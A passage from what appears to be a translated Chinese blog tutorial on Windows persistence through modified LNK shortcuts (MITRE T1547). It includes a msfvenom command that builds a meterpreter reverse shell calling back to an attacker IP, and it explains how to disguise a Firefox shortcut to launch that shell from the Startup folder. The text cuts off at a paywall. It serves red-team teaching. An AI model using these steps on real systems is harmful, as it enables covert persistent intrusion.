攻击者经常使用Windows 持久化技术(例如修改快捷方式)来维持访问权限或提升权限。因此,在本篇博文中,我们将探讨修改LNK 快捷方式如何帮助攻击者获得受感染系统的持久访问权限。
快捷方式修改是一种攻击者替换与快捷方式绑定的可执行文件的绝对路径的技术。这样,他们就可以用一个看似合法的图标来伪装快捷方式,并在启动时运行,从而实现持久化。在本文中,我们将探讨两种帮助攻击者通过这种技术实现Windows 持久化的简单方法。
- MITRE TACTIC:权限提升(TA0004)和持久性(TA0003)
- MITRE 技术 ID:T1547 (启动或登录自动启动执行)
- 副标题:PE注射(T1547.009 )
目录
- 背景
- PERS1 – 手动快捷方式修改 + 反向shell
- PERS2 – 手动快捷方式修改 + Powershell One Liner
- PERS3 – 使用 SharPersist.exe 修改快捷方式
- PERS4 – 快捷方式创建和 NTLM 哈希泄露
- 结论
背景
Windows 的快捷方式文件以 *.LNK 扩展名结尾,包含可使用此快捷方式运行的可执行文件的绝对路径。自从 50 美分达到顶峰,网络安全意识也随之下降以来,攻击者就一直利用快捷方式进行攻击。一个例子就是公共网吧使用的 CD 和 DVD 中经常包含恶意快捷方式,从而传播恶意软件。在现代 Windows 系统中,LNK 文件能够运行大量文件,包括 exe、cmd、vbs、powershell 等。现在,攻击者可以创建嵌入 powershell 脚本的新快捷方式,或者修改现有的快捷方式以进行更隐蔽的攻击。在本文中,我们将讨论这些方法。
PERS1 – 手动快捷键修改 + 反向shell
要开始漏洞利用,我们首先需要设置在系统启动时运行的有效载荷。我使用 msfvenom 创建了一个 meterpreter 有效载荷。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.78.142 lport=1234 -f exe > shell.exe
现在一切准备就绪,我们可以继续进行持久化方法 1。这里,我们假设我们已经攻陷了系统,并且已经通过 RDP 或其他任何允许我们查看受害者 GUI 的协议连接到服务器。在受害者的桌面上,我们发现了一个 Firefox 快捷方式。
如您所见,快捷方式中的目标字段设置为运行 Firefox 可执行文件。我们只需使用我们自己的命令来切换它即可。在本例中,我将通过提供 shell.exe 文件的路径来运行我的反向 shell。另外,我们将以最小化模式启动它,以便更加隐蔽。
但你可能已经注意到,图标已经变了。为了将其替换回所需的 Firefox 图标,我们需要点击图标并将其指向 Firefox.exe 二进制文件。
现在必须设置并完成所有操作,并且图标已替换为 Firefox 图标。
现在,我们需要将此快捷方式放在启动文件夹中,以便每次系统重新启动时执行它。
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
